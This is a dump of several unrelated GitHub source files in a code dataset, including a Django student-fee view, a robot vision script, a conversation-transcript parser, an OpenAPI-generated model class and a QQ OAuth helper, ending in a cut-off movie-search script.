amt>=fee_str.Libr_7:\r\n stud_fee.Libr_7_Paid=fee_str.Libr_7\r\n amt=amt-fee_str.Libr_7\r\n elif (amt+stud_fee.Libr_7_Paid)>=fee_str.Libr_7:\r\n amt=amt+stud_fee.Libr_7_Paid-fee_str.Libr_7\r\n stud_fee.Libr_7_Paid=fee_str.Libr_7\r\n else:\r\n stud_fee.Libr_7_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Semi_8_Paid!=fee_str.Semi_8:\r\n if amt>=fee_str.Semi_8:\r\n stud_fee.Semi_8_Paid=fee_str.Semi_8\r\n amt=amt-fee_str.Semi_8\r\n elif (amt+stud_fee.Semi_8_Paid)>=fee_str.Semi_8:\r\n amt=amt+stud_fee.Semi_8_Paid-fee_str.Semi_8\r\n stud_fee.Semi_8_Paid=fee_str.Semi_8\r\n else:\r\n stud_fee.Semi_8_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Soft_9_Paid!=fee_str.Soft_9:\r\n if amt>=fee_str.Soft_9:\r\n stud_fee.Soft_9_Paid=fee_str.Soft_9\r\n amt=amt-fee_str.Soft_9\r\n elif (amt+stud_fee.Soft_9_Paid)>=fee_str.Soft_9:\r\n amt=amt+stud_fee.Soft_9_Paid-fee_str.Soft_9\r\n stud_fee.Soft_9_Paid=fee_str.Soft_9\r\n else:\r\n stud_fee.Soft_9_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Conf_10_Paid!=fee_str.Conf_10:\r\n if amt>=fee_str.Conf_10:\r\n stud_fee.Conf_10_Paid=fee_str.Conf_10\r\n amt=amt-fee_str.Conf_10\r\n elif (amt+stud_fee.Conf_10_Paid)>=fee_str.Conf_10:\r\n amt=amt+stud_fee.Conf_10_Paid-fee_str.Conf_10\r\n stud_fee.Conf_10_Paid=fee_str.Conf_10\r\n else:\r\n stud_fee.Conf_10_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Subj_11_Paid!=fee_str.Subj_11:\r\n if amt>=fee_str.Subj_11:\r\n stud_fee.Subj_11_Paid=fee_str.Subj_11\r\n amt=amt-fee_str.Subj_11\r\n elif (amt+stud_fee.Subj_11_Paid)>=fee_str.Subj_11:\r\n amt=amt+stud_fee.Subj_11_Paid-fee_str.Subj_11\r\n stud_fee.Subj_11_Paid=fee_str.Subj_11\r\n else:\r\n stud_fee.Subj_11_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Spor_12_Paid!=fee_str.Spor_12:\r\n if amt>=fee_str.Spor_12:\r\n stud_fee.Spor_12_Paid=fee_str.Spor_12\r\n amt=amt-fee_str.Spor_12\r\n elif (amt+stud_fee.Spor_12_Paid)>=fee_str.Spor_12:\r\n amt=amt+stud_fee.Spor_12_Paid-fee_str.Spor_12\r\n stud_fee.Spor_12_Paid=fee_str.Spor_12\r\n else:\r\n stud_fee.Spor_12_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Tran_13_Paid!=fee_str.Tran_13:\r\n if amt>=fee_str.Tran_13:\r\n stud_fee.Tran_13_Paid=fee_str.Tran_13\r\n amt=amt-fee_str.Tran_13\r\n elif (amt+stud_fee.Tran_13_Paid)>=fee_str.Tran_13:\r\n amt=amt+stud_fee.Tran_13_Paid-fee_str.Tran_13\r\n stud_fee.Tran_13_Paid=fee_str.Tran_13\r\n else:\r\n stud_fee.Tran_13_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Tuti_14_Paid!=fee_str.Tuti_14:\r\n if amt>=fee_str.Tuti_14:\r\n stud_fee.Tuti_14_Paid=fee_str.Tuti_14\r\n amt=amt-fee_str.Tuti_14\r\n elif 
(amt+stud_fee.Tuti_14_Paid)>=fee_str.Tuti_14:\r\n amt=amt+stud_fee.Tuti_14_Paid-fee_str.Tuti_14\r\n stud_fee.Tuti_14_Paid=fee_str.Tuti_14\r\n else:\r\n stud_fee.Tuti_14_Paid+=amt\r\n amt=0\r\n\r\n if(amt):\r\n if stud_fee.Volu_15_Paid!=fee_str.Volu_15:\r\n if amt>=fee_str.Volu_15:\r\n stud_fee.Volu_15_Paid=fee_str.Volu_15\r\n amt=amt-fee_str.Volu_15\r\n elif (amt+stud_fee.Volu_15_Paid)>=fee_str.Volu_15:\r\n amt=amt+stud_fee.Volu_15_Paid-fee_str.Volu_15\r\n stud_fee.Volu_15_Paid=fee_str.Volu_15\r\n else:\r\n stud_fee.Volu_15_Paid+=amt\r\n amt=0\r\n \r\n stud_fee.Paid=stud_fee.Apti_1_Paid+stud_fee.Tech_2_Paid+stud_fee.Book_3_Paid+stud_fee.IndP_4_Paid+stud_fee.IndV_5_Paid+stud_fee.Inte_6_Paid+stud_fee.Libr_7_Paid+stud_fee.Semi_8_Paid+stud_fee.Soft_9_Paid+stud_fee.Conf_10_Paid+stud_fee.Subj_11_Paid+stud_fee.Spor_12_Paid+stud_fee.Tran_13_Paid+stud_fee.Tuti_14_Paid+stud_fee.Volu_15_Paid\r\n due=stud_fee.Due\r\n stud_fee.Due=stud_fee.Total-stud_fee.Paid\r\n due-=stud_fee.Due\r\n stud_fee.save()\r\n\r\n if due:\r\n fee_record = Fee_Record.objects.create(Stud_Fee_ID=stud_fee,Fee_Paid=due,Added_by=request.user)\r\n fee_record.save() \r\n \r\n else: \r\n \r\n paid1=request.POST.get('paid1',False)\r\n if paid1:\r\n stud_fee.Apti_1_Paid=fee_str.Apti_1\r\n paid2=request.POST.get('paid2',False)\r\n if paid2:\r\n stud_fee.Tech_2_Paid=fee_str.Tech_2\r\n paid3=request.POST.get('paid3',False)\r\n if paid3:\r\n stud_fee.Book_3_Paid=fee_str.Book_3\r\n paid4=request.POST.get('paid4',False)\r\n if paid4:\r\n stud_fee.IndP_4_Paid=fee_str.IndP_4\r\n paid5=request.POST.get('paid5',False)\r\n if paid5:\r\n stud_fee.IndV_5_Paid=fee_str.IndV_5\r\n paid6=request.POST.get('paid6',False)\r\n if paid6:\r\n stud_fee.Inte_6_Paid=fee_str.Inte_6\r\n paid7=request.POST.get('paid7',False)\r\n if paid7:\r\n stud_fee.Libr_7_Paid=fee_str.Libr_7\r\n paid8=request.POST.get('paid8',False)\r\n if paid8:\r\n stud_fee.Semi_8_Paid=fee_str.Semi_8\r\n paid9=request.POST.get('paid9',False)\r\n if paid9:\r\n stud_fee.Soft_9_Paid=fee_str.Soft_9\r\n paid10=request.POST.get('paid10',False)\r\n if paid10:\r\n stud_fee.Conf_10_Paid=fee_str.Conf_10\r\n paid11=request.POST.get('paid11',False)\r\n if paid11:\r\n stud_fee.Subj_11_Paid=fee_str.Subj_11\r\n paid12=request.POST.get('paid12',False)\r\n if paid12:\r\n stud_fee.Spor_12_Paid=fee_str.Spor_12\r\n paid13=request.POST.get('paid13',False)\r\n if paid13:\r\n stud_fee.Tran_13_Paid=fee_str.Tran_13\r\n paid14=request.POST.get('paid14',False)\r\n if paid14:\r\n stud_fee.Tuti_14_Paid=fee_str.Tuti_14\r\n paid15=request.POST.get('paid15',False)\r\n if paid15:\r\n stud_fee.Volu_15_Paid=fee_str.Volu_15\r\n \r\n stud_fee.Paid=stud_fee.Apti_1_Paid+stud_fee.Tech_2_Paid+stud_fee.Book_3_Paid+stud_fee.IndP_4_Paid+stud_fee.IndV_5_Paid+stud_fee.Inte_6_Paid+stud_fee.Libr_7_Paid+stud_fee.Semi_8_Paid+stud_fee.Soft_9_Paid+stud_fee.Conf_10_Paid+stud_fee.Subj_11_Paid+stud_fee.Spor_12_Paid+stud_fee.Tran_13_Paid+stud_fee.Tuti_14_Paid+stud_fee.Volu_15_Paid\r\n due=stud_fee.Due\r\n stud_fee.Due=stud_fee.Total-stud_fee.Paid\r\n due-=stud_fee.Due\r\n stud_fee.save()\r\n if due:\r\n fee_record = Fee_Record.objects.create(Stud_Fee_ID=stud_fee,Fee_Paid=due,Added_by=request.user)\r\n fee_record.save()\r\n\r\n \r\n else: \r\n stud_pd = Stud_PD.objects.get(USN=usn)\r\n stud_ad = Stud_Admn.objects.get(Sid=stud_pd.Sid)\r\n fee_str = Fee_Str.objects.get(Fid=str(stud_ad.Fid))\r\n stud_fee = Stud_Fees.objects.get(Adm_No_S=stud_ad.Adm_No)\r\n fee={\r\n 'fee1':fee_str.Apti_1-stud_fee.Apti_1_Paid,\r\n 
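The fifteen per-component blocks above repeat one allocation rule, and their first branch (`if amt >= fee_str.X`) appears to deduct the full component fee from `amt` even when `X_Paid` is already nonzero, silently losing part of the payment; the second and third branches handle that case correctly. A sketch of the same rule as a single loop over component names, where `min()` reproduces the intent of those branches without the overcharge.

```python
FEE_COMPONENTS = [
    'Apti_1', 'Tech_2', 'Book_3', 'IndP_4', 'IndV_5', 'Inte_6', 'Libr_7',
    'Semi_8', 'Soft_9', 'Conf_10', 'Subj_11', 'Spor_12', 'Tran_13',
    'Tuti_14', 'Volu_15',
]

def allocate_payment(stud_fee, fee_str, amt):
    """Spread amt across components in order, never exceeding each cap."""
    for name in FEE_COMPONENTS:
        if amt <= 0:
            break
        cap = getattr(fee_str, name)              # e.g. fee_str.Apti_1
        paid = getattr(stud_fee, name + '_Paid')  # e.g. stud_fee.Apti_1_Paid
        portion = min(amt, cap - paid)            # never exceed the cap
        setattr(stud_fee, name + '_Paid', paid + portion)
        amt -= portion
    stud_fee.Paid = sum(getattr(stud_fee, n + '_Paid') for n in FEE_COMPONENTS)
    stud_fee.Due = stud_fee.Total - stud_fee.Paid
```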
'fee2':fee_str.Tech_2-stud_fee.Tech_2_Paid,\r\n 'fee3':fee_str.Book_3-stud_fee.Book_3_Paid,\r\n 'fee4':fee_str.IndP_4-stud_fee.IndP_4_Paid,\r\n 'fee5':fee_str.IndV_5-stud_fee.IndV_5_Paid,\r\n 'fee6':fee_str.Inte_6-stud_fee.Inte_6_Paid,\r\n 'fee7':fee_str.Libr_7-stud_fee.Libr_7_Paid,\r\n 'fee8':fee_str.Semi_8-stud_fee.Semi_8_Paid,\r\n 'fee9':fee_str.Soft_9-stud_fee.Soft_9_Paid,\r\n 'fee10':fee_str.Conf_10-stud_fee.Conf_10_Paid,\r\n 'fee11':fee_str.Subj_11-stud_fee.Subj_11_Paid,\r\n 'fee12':fee_str.Spor_12-stud_fee.Spor_12_Paid,\r\n 'fee13':fee_str.Tran_13-stud_fee.Tran_13_Paid,\r\n 'fee14':fee_str.Tuti_14-stud_fee.Tuti_14_Paid,\r\n 'fee15':fee_str.Volu_15-stud_fee.Volu_15_Paid,\r\n \r\n }\r\n\r\n return render(request, 'entry/updatestudfee.html',{'stud_ad':stud_ad,'fee_str':fee_str,'stud_pd':stud_pd,'stud_fee':stud_fee,'fee':fee})\r\n\r\n\r\n@login_required(login_url=\"/accounts/login/\")\r\ndef delete_stud_pd(request,usn):\r\n stud_pd=Stud_PD.objects.get(USN=usn)\r\n if request.method==\"POST\":\r\n stud_pd.delete()\r\n return redirect('details:list')\r\n else:\r\n return render(request,'entry/deletestudpd.html',{'stud_pd':stud_pd})\r\n","repo_name":"prajwalrajbr/updatedstudfeemgmt","sub_path":"entry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32466265666","text":"from networktables import NetworkTables\nfrom pipeline import ContourPipeline\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom datetime import datetime\nimport time\nimport cv2\nimport math\n\nNetworkTables.initialize(server='10.2.79.2')\nprint('Waiting to connect...')\nwhile NetworkTables.isConnected() is False:\n time.sleep(0.1)\n\nnt = NetworkTables.getTable(\"Gear\")\n# imageWidth = 1280\n\n\n# def getDFromW(width):\n# return 7362.30054*(math.pow(float(width), -1.186536))\n\n\n# def getDFromH(height):\n# return 9963.977172*(math.pow(float(height), -1.072971))\n\n\n# def getDFromWt(widthTotal):\n# return 5745.771277*(math.pow(float(widthTotal), -0.895025))\n\n\nstart_time = datetime.now()\n\n\n# def millis():\n# dt = datetime.now() - start_time\n# ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0\n# return ms\n\n\nvis = ContourPipeline()\ncamera = PiCamera()\nwhile True:\n imgArray = PiRGBArray(camera, size=(1280, 720))\n camera.resolution = (1280, 720)\n camera.capture(imgArray, format=\"bgr\", use_video_port=True)\n img = imgArray.array\n contours = vis.process(img)\n # Checking if 2 contours exist\n if 1 < len(contours):\n # Creating bounding rectangles around each contour\n rect1 = cv2.boundingRect(contours[0])\n rect2 = cv2.boundingRect(contours[1])\n # creating class object to hold values for first contour\n\n class rectObj1:\n topY = rect1[1]\n botY = (rect1[1] - rect1[3])\n leftX = rect1[0]\n rightX = rect1[0] + rect1[2]\n # top left point\n pt1 = (leftX, topY)\n # bottom right point\n pt2 = (rightX, botY)\n # width and height\n w = rect1[2]\n h = rect1[3]\n # creating class object to hold values for second contour\n\n class rectObj2:\n topY = rect2[1]\n botY = (rect2[1] - rect2[3])\n leftX = rect2[0]\n rightX = rect2[0] + rect2[2]\n # top left point\n pt1 = (leftX, topY)\n # bottom right point\n pt2 = (rightX, botY)\n # width and height\n w = rect2[2]\n h = rect2[3]\n # establishing which rectangle is above the other\n if(rectObj1.topY > rectObj2.topY):\n topRect = rectObj1\n botRect = rectObj2\n else:\n topRect = rectObj2\n 
botRect = rectObj1\n # printing out values\n print('Top Rectangle Height: ' + topRect.h + ' Top Rectangle Width: ' + topRect.w)\n nt.putValue('TopRectHeight', topRect.h)\n nt.putValue('TopRectWidth', topRect.w)\n print('Bottom Rectangle Height: ' + botRect.h + ' Bottom Rectangle Width: ' + botRect.w)\n nt.putValue('BotRectHeight', botRect.h)\n nt.putValue('BotRectWidth', botRect.w)\n print('Total Height: ' + (topRect.topY - botRect.botY) + ' Total Width: ' + (botRect.rightX - topRect.leftX))\n nt.putValue('TotalHeight', (topRect.topY - botRect.botY))\n nt.putValue('TotalWidth', (botRect.rightX - topRect.leftX))\n","repo_name":"FRCTeam279/VisionPlayground","sub_path":"Boiler/boilerValues.py","file_name":"boilerValues.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27955259318","text":"import re\nfrom typing import List\nimport oneai\nfrom oneai.classes import Utterance\n\n\n# v 1.6.1\ndef parse_conversation(text: str, strict=False) -> List[Utterance]:\n \"\"\"\n Parse a string with a conversation format into a structured `Utterance` list representing the conversation.\n\n ## Parameters\n\n `text: str`\n The text to parse.\n\n ## Returns\n\n A list of `Utterance` objects produced from `text`.\n\n ## Raises\n\n `ValueError` if `text` is not in a valid conversation format.\n \"\"\"\n\n srt_regex = re.compile(\n r\"\\d+\\n\\d{1,2}:\\d{2}:\\d{2}[,.]\\d{1,3} --> \\d{1,2}:\\d{2}:\\d{2}[,.]\\d{1,3}\"\n )\n match = srt_regex.match(text)\n if match:\n data_array = srt_regex.split(text)\n return [\n Utterance(speaker=\"SPEAKER\", utterance=line.strip().replace(\"\\n\", \" \"))\n for line in data_array[1:]\n ]\n\n result = []\n lines = re.split(r\"\\r?\\n\", text.strip())\n firstLine = True\n structure = None\n currentLineInfo = None\n waitForTextLine = False\n # weak = False\n previousObject = None\n\n for i, line in enumerate(lines):\n if _isEmptyOrWhitespace(line):\n continue\n\n if waitForTextLine:\n previousObject[\"text\"] = line.strip()\n # previousObject[\"text_line\"] = i\n waitForTextLine = False\n continue\n\n currentLineInfo = _parseSpeakerLine(line)\n if currentLineInfo is None:\n if firstLine:\n raise ValueError(f\"Invalid conversation format at line {i}\")\n previousObject[\"text\"] += \"\\n\" + line.strip()\n # weak = True\n continue\n\n if firstLine:\n structure = currentLineInfo\n\n # weak |= currentLineInfo[\"weak\"]\n if strict and not _comp(structure, currentLineInfo):\n raise ValueError(\n f\"Differing conversation format at line {i}, run with strict=False to ignore\"\n )\n\n firstLine = False\n\n previousObject = {\n \"speaker\": currentLineInfo[\"speaker\"],\n \"text\": currentLineInfo[\"text\"],\n # \"speaker_line\": i, # what are these properties for? 
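The `print` calls at the end of boilerValues.py concatenate strings with ints (`'Top Rectangle Height: ' + topRect.h`), which raises `TypeError` on the first detection. Note also that `cv2.boundingRect` returns `(x, y, w, h)` with `y` at the top edge in image coordinates, so `botY = rect[1] - rect[3]` in the `rectObj` classes is likely meant to be `rect[1] + rect[3]`. f-strings fix the crash without changing the values published to NetworkTables:

```python
# str + int raises TypeError; format instead of concatenating.
print(f'Top Rectangle Height: {topRect.h} Top Rectangle Width: {topRect.w}')
print(f'Bottom Rectangle Height: {botRect.h} Bottom Rectangle Width: {botRect.w}')
print(f'Total Height: {topRect.topY - botRect.botY} '
      f'Total Width: {botRect.rightX - topRect.leftX}')
```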
do I want them in Utterance objects?\n # \"text_line\": i,\n # \"speaker_length\": currentLineInfo[\"speaker_end\"],\n }\n if currentLineInfo[\"timestamp\"]:\n previousObject[\"timestamp\"] = currentLineInfo[\"timestamp\"]\n\n result.append(previousObject)\n waitForTextLine = not currentLineInfo[\"hasText\"]\n if previousObject and _isEmptyOrWhitespace(previousObject[\"text\"]):\n result.pop()\n\n return [\n Utterance(\n speaker=u[\"speaker\"],\n utterance=u[\"text\"],\n timestamp=u.get(\"timestamp\", None),\n )\n for u in result\n ]\n\n\ndef _isEmptyOrWhitespace(text):\n return (not text) or (text.isspace())\n\n\ndef _parseSpeakerLine(text: str):\n value = {\n \"weak\": True,\n \"preTime\": False,\n \"speaker\": None,\n \"speaker_end\": None,\n \"time\": False,\n \"timestamp\": None,\n \"timestamp_full_match_string\": None,\n \"separator\": False,\n \"hasText\": False,\n \"text\": None,\n }\n\n ################################################\n # extracting timestamp from text\n matchArea = text[:40]\n colonPos = matchArea.find(\":\")\n timestampFound = get_timestamp(matchArea, value)\n signatureEndPos = 0\n if timestampFound:\n if colonPos != -1 and colonPos < value[\"timestamp_position\"]:\n timestampFound = False\n value[\"time\"] = False\n value[\"timestamp\"] = None\n else:\n if value[\"timestamp_position\"] == 0:\n value[\"preTime\"] = True\n text = text.replace(value[\"timestamp_full_match_string\"], \"\")\n matchArea = matchArea.replace(value[\"timestamp_full_match_string\"], \"\")\n signatureEndPos = len(value[\"timestamp_full_match_string\"])\n ################################################\n # check if speaker only, in all caps - WEAK PATTERN\n match = (\n re.search(r\"^[ A-Za-z_-]{3,20}$\", text)\n if timestampFound\n else re.search(r\"^[ A-Z_-]{3,20}$\", text)\n )\n if match is not None:\n value[\"weak\"] = not timestampFound\n value[\"speaker\"] = match[0].strip()\n # end position for speaker signature area (for highlighting),\n # use match[0].length to include whitespace\n value[\"speaker_end\"] = len(match[0]) + signatureEndPos\n value[\"hasText\"] = False\n return value\n\n # update colon position after timestamp removal\n if timestampFound:\n colonPos = matchArea.find(\":\")\n\n if colonPos == -1 and not timestampFound:\n return None # failed to find signature\n\n if colonPos == -1: # only timestamp\n if len(text) != 0:\n return None # if text after timestamp, fail\n value[\"weak\"] = True\n value[\"speaker\"] = \"Speaker\"\n value[\"speaker_end\"] = signatureEndPos\n value[\"hasText\"] = False\n\n value[\"separator\"] = True\n\n # if no whitespace after speaker, fail same line text\n textPos = colonPos + 1\n value[\"hasText\"] = textPos < len(text.rstrip()) - 1\n if value[\"hasText\"] and \" \\t\\n\\r\\v\".find(text[textPos]) == -1:\n return None\n\n value[\"weak\"] = False\n value[\"text\"] = text[textPos:].strip() if value[\"hasText\"] else None\n value[\"speaker\"] = text[:colonPos].strip()\n value[\"speaker_end\"] = signatureEndPos + colonPos\n return value\n\n\ndef _comp(a, b):\n return (\n a[\"separator\"] == b[\"separator\"]\n and a[\"time\"] == b[\"time\"]\n and a[\"preTime\"] == b[\"preTime\"]\n and a[\"hasText\"] == b[\"hasText\"]\n )\n\n\ndef get_timestamp(text, value):\n # match preceding timestamp \"[3:07 PM, 3/15/2022] Adam Hanft: Helps\"\n match = re.search(r\"(^\\s*\\[?\\s*)([0-9:,\\sPAM/]{4,23})(\\]?)\\s*\", text)\n if match is not None and (match[3] or match[0].find(\"/\") != -1):\n value[\"preTime\"] = True\n value[\"weak\"] = False\n 
value[\"time\"] = True\n value[\"timestamp\"] = match[2].strip()\n value[\"timestamp_position\"] = index_of_group(match, 2)\n value[\"timestamp_full_match_string\"] = match[0]\n return True\n\n # optinal [ timestamp ] \\s*\n match = re.search(r\"(^\\s*)?(\\[?)(\\d{1,2}:\\d{1,2})(:\\d{1,2})?(\\.\\d*)?(\\]?\\s*)\", text)\n if match is not None:\n value[\"weak\"] = False\n value[\"time\"] = True\n value[\"timestamp_position\"] = match.start()\n value[\"timestamp_full_match_string\"] = match[0]\n # capture timestamp without non-captured groups\n value[\"timestamp\"] = text[\n index_of_group(match, 3) : index_of_group(match, 6)\n ].strip()\n return True\n\n return False\n\n\ndef index_of_group(match: re.Match, group: int):\n ix = match.start()\n for i in range(1, group):\n if match[i]:\n ix += len(match[i])\n return ix\n","repo_name":"oneai-nlp/oneai-python","sub_path":"src/oneai/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":6996,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"72"} +{"seq_id":"25164252510","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom openapi_server.models.base_model_ import Model\nfrom openapi_server.models.identifier import Identifier\nfrom openapi_server.models.tag import Tag\nfrom openapi_server import util\n\nfrom openapi_server.models.identifier import Identifier # noqa: E501\nfrom openapi_server.models.tag import Tag # noqa: E501\n\nclass Check(Model):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, timestamp=None, identifiers=None, tags=None, left_compare_obj=None, right_compare_obj=None, operator='equals', uname=None): # noqa: E501\n \"\"\"Check - a model defined in OpenAPI\n\n :param timestamp: The timestamp of this Check. # noqa: E501\n :type timestamp: datetime\n :param identifiers: The identifiers of this Check. # noqa: E501\n :type identifiers: List[Identifier]\n :param tags: The tags of this Check. # noqa: E501\n :type tags: List[Tag]\n :param left_compare_obj: The left_compare_obj of this Check. # noqa: E501\n :type left_compare_obj: Dict[str, object]\n :param right_compare_obj: The right_compare_obj of this Check. # noqa: E501\n :type right_compare_obj: Dict[str, object]\n :param operator: The operator of this Check. # noqa: E501\n :type operator: str\n :param uname: The uname of this Check. # noqa: E501\n :type uname: str\n \"\"\"\n self.openapi_types = {\n 'timestamp': datetime,\n 'identifiers': List[Identifier],\n 'tags': List[Tag],\n 'left_compare_obj': Dict[str, object],\n 'right_compare_obj': Dict[str, object],\n 'operator': str,\n 'uname': str\n }\n\n self.attribute_map = {\n 'timestamp': 'timestamp',\n 'identifiers': 'identifiers',\n 'tags': 'tags',\n 'left_compare_obj': 'leftCompareObj',\n 'right_compare_obj': 'rightCompareObj',\n 'operator': 'operator',\n 'uname': 'uname'\n }\n\n self._timestamp = timestamp\n self._identifiers = identifiers\n self._tags = tags\n self._left_compare_obj = left_compare_obj\n self._right_compare_obj = right_compare_obj\n self._operator = operator\n self._uname = uname\n\n @classmethod\n def from_dict(cls, dikt) -> 'Check':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The check of this Check. 
# noqa: E501\n :rtype: Check\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def timestamp(self):\n \"\"\"Gets the timestamp of this Check.\n\n\n :return: The timestamp of this Check.\n :rtype: datetime\n \"\"\"\n return self._timestamp\n\n @timestamp.setter\n def timestamp(self, timestamp):\n \"\"\"Sets the timestamp of this Check.\n\n\n :param timestamp: The timestamp of this Check.\n :type timestamp: datetime\n \"\"\"\n\n self._timestamp = timestamp\n\n @property\n def identifiers(self):\n \"\"\"Gets the identifiers of this Check.\n\n An array of ordered static* identifiers that in combination with the checkUName used as a unique record identifiers.
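The `openapi_types`/`attribute_map` pair set in `Check.__init__` drives (de)serialization in the generator's base `Model` class, which is not part of this record. An illustrative sketch of how such a base class can use `attribute_map` to emit the camelCase JSON keys; this is an assumption about the generated base, not its actual source.

```python
def to_dict(model):
    """Serialize a generated model using its attribute_map
    (snake_case attribute -> camelCase JSON key)."""
    result = {}
    for attr, json_key in model.attribute_map.items():
        value = getattr(model, attr)
        if value is not None:
            result[json_key] = value
    return result
```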
*Static refers to the fact the identifiers will remain in the same order, unless there's a desired change. # noqa: E501\n\n :return: The identifiers of this Check.\n :rtype: List[Identifier]\n \"\"\"\n return self._identifiers\n\n @identifiers.setter\n def identifiers(self, identifiers):\n \"\"\"Sets the identifiers of this Check.\n\n An array of ordered static* identifiers that in combination with the checkUName used as a unique record identifiers.
*Static refers to the fact the identifiers will remain in the same order, unless there's a desired change. # noqa: E501\n\n :param identifiers: The identifiers of this Check.\n :type identifiers: List[Identifier]\n \"\"\"\n\n self._identifiers = identifiers\n\n @property\n def tags(self):\n \"\"\"Gets the tags of this Check.\n\n Non-unique identifiers (tags) for the check that can be searched by. # noqa: E501\n\n :return: The tags of this Check.\n :rtype: List[Tag]\n \"\"\"\n return self._tags\n\n @tags.setter\n def tags(self, tags):\n \"\"\"Sets the tags of this Check.\n\n Non-unique identifiers (tags) for the check that can be searched by. # noqa: E501\n\n :param tags: The tags of this Check.\n :type tags: List[Tag]\n \"\"\"\n\n self._tags = tags\n\n @property\n def left_compare_obj(self):\n \"\"\"Gets the left_compare_obj of this Check.\n\n Actual result # noqa: E501\n\n :return: The left_compare_obj of this Check.\n :rtype: Dict[str, object]\n \"\"\"\n return self._left_compare_obj\n\n @left_compare_obj.setter\n def left_compare_obj(self, left_compare_obj):\n \"\"\"Sets the left_compare_obj of this Check.\n\n Actual result # noqa: E501\n\n :param left_compare_obj: The left_compare_obj of this Check.\n :type left_compare_obj: Dict[str, object]\n \"\"\"\n\n self._left_compare_obj = left_compare_obj\n\n @property\n def right_compare_obj(self):\n \"\"\"Gets the right_compare_obj of this Check.\n\n Expected result # noqa: E501\n\n :return: The right_compare_obj of this Check.\n :rtype: Dict[str, object]\n \"\"\"\n return self._right_compare_obj\n\n @right_compare_obj.setter\n def right_compare_obj(self, right_compare_obj):\n \"\"\"Sets the right_compare_obj of this Check.\n\n Expected result # noqa: E501\n\n :param right_compare_obj: The right_compare_obj of this Check.\n :type right_compare_obj: Dict[str, object]\n \"\"\"\n if right_compare_obj is None:\n raise ValueError(\"Invalid value for `right_compare_obj`, must not be `None`\") # noqa: E501\n\n self._right_compare_obj = right_compare_obj\n\n @property\n def operator(self):\n \"\"\"Gets the operator of this Check.\n\n Comparison operator, from left to right, when order matters. # noqa: E501\n\n :return: The operator of this Check.\n :rtype: str\n \"\"\"\n return self._operator\n\n @operator.setter\n def operator(self, operator):\n \"\"\"Sets the operator of this Check.\n\n Comparison operator, from left to right, when order matters. 
# noqa: E501\n\n :param operator: The operator of this Check.\n :type operator: str\n \"\"\"\n allowed_values = [\"equals\", \"notequals\", \"greaterthan\", \"lessthan\", \"contains\", \"notcontains\"] # noqa: E501\n if operator not in allowed_values:\n raise ValueError(\n \"Invalid value for `operator` ({0}), must be one of {1}\"\n .format(operator, allowed_values)\n )\n\n self._operator = operator\n\n @property\n def uname(self):\n \"\"\"Gets the uname of this Check.\n\n Check unique name (used as id) # noqa: E501\n\n :return: The uname of this Check.\n :rtype: str\n \"\"\"\n return self._uname\n\n @uname.setter\n def uname(self, uname):\n \"\"\"Sets the uname of this Check.\n\n Check unique name (used as id) # noqa: E501\n\n :param uname: The uname of this Check.\n :type uname: str\n \"\"\"\n if uname is None:\n raise ValueError(\"Invalid value for `uname`, must not be `None`\") # noqa: E501\n\n self._uname = uname\n","repo_name":"yanirta/assertio","sub_path":"server/openapi_server/models/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":7715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"3230339424","text":"# -*- coding: utf-8 -*-\r\n\r\n__author__ = 'liupeiyu'\r\n\r\nfrom qq_config import *\r\nfrom qq_request_params import *\r\nimport urllib\r\n\r\nclass QQAuthorize(object):\r\n\t'''\r\n\thttps://graph.qq.com/oauth2.0/authorize?response_type=code&\r\n\t\tclient_id=[YOUR_APPID]&\r\n\t\tredirect_uri=[YOUR_REDIRECT_URI]&\r\n\t\tscope=[THE_SCOPE]\r\n\t'''\r\n\tQQ_AUTHORIZE_URL_TMPL =\"https://graph.qq.com/oauth2.0/authorize?response_type=code&client_id={}&redirect_uri={}&state={}\"\r\n\r\n\r\n\tdef __init__(self, request):\r\n\t\tself.authorize_post_request = request\r\n\r\n\t\tself.qq_config = QQConfig(request.user_profile)\r\n\t\tself.qq_params = QQRequestParams\r\n\t\tself.redirect_uri = self.qq_config.get_login_callback_redirect_uri(request)\r\n\r\n\tdef get_Http_authorize_url(self):\r\n\t\tstate = self.qq_config.get_state(self.authorize_post_request)\r\n\t\tverity_url = self.QQ_AUTHORIZE_URL_TMPL.format(\r\n\t\t\tself.qq_config.app_id,\r\n\t\t\turllib.quote(self.redirect_uri, ''),\r\n\t\t\tstate)\r\n\t\treturn verity_url","repo_name":"chengdg/weizoom","sub_path":"weapp/core/qq/qq_authorize.py","file_name":"qq_authorize.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32617268730","text":"\"\"\"\r\nThis script is the first search engine without a score\r\nreturns title, intro and url for relevant films\r\n\"\"\"\r\nimport pandas as pd\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\n# get the urls of each movie\r\nsoup = BeautifulSoup(open(\"movies1.html\"), features=\"lxml\")\r\nurl_list = 